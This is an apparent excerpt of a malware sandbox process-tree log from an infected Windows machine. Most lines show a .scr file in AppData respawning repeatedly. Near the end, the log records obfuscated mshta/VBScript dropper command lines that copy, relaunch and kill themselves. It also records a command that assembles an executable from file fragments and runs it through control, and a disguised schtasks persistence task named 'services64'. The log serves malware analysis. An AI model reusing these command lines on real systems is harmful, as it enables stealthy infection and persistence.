C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12712
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12720
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12736
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12744
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12752
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12760
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12792
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12828
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12836
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12852
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12876
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12884
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12908
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12916
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12924
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12964
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12976
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12984
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13032
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13040
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13048
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13056
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13068
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13076
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13088
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13096
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13104
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13120
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13128
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13136
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13152
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13168
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13184
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13192
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13200
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13212
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13224
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13232
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13240
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13256
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13272
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13288
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13304
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12260
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12272
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1756
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1684
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4304
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13336
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13328
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13368
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13376
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13392
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13408
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13416
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13440
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13448
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13464
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13476
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13484
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13492
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13500
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13516
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13524
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13540
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13532
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13548
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13556
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13572
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13588
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13596
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13612
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13620
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13628
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13636
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13644
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13660
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13668
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13692
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13708
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13724
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13760
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13776
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13792
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13816
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13824
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13832
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13876
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13884
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13892
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13912
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13920
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13940
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13980
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13996
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14028
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14084
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14100
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14116
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14132
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14152
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14144
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14172
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14184
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14200
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14208
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14256
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14276
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14292
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14304
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13084
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13472
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:13976
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1828
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14216
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14252
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14300
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14332
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14364
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14372
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14404
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14396
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14432
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14448
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14472
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14480
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14496
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14508
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14516
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14528
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14536
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14544
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14552
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14584
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14612
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14620
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14628
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14636
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14652
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14660
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14676
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:14696
-
-
-
C:\Users\Admin\AppData\Roaming\4296541.scr"C:\Users\Admin\AppData\Roaming\4296541.scr" /S8⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\sad.exe"C:\Users\Admin\AppData\Local\Temp\sad.exe"7⤵PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵PID:2996
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵PID:652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵PID:2988
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵PID:2352
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵PID:2276
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵PID:3300
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵PID:3532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵PID:3912
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:3060
-
C:\Users\Admin\AppData\Local\Temp\is-HD5VF.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HD5VF.tmp\setup.tmp" /SL5="$1025A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:932
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵PID:2936
-
C:\Users\Admin\AppData\Local\Temp\is-2FP44.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2FP44.tmp\setup.tmp" /SL5="$20270,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\is-ECAF8.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-ECAF8.tmp\postback.exe" ss111⤵PID:1760
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"7⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:3744
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:3008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3620
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3672
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4092
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3760
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1076
-
-
-
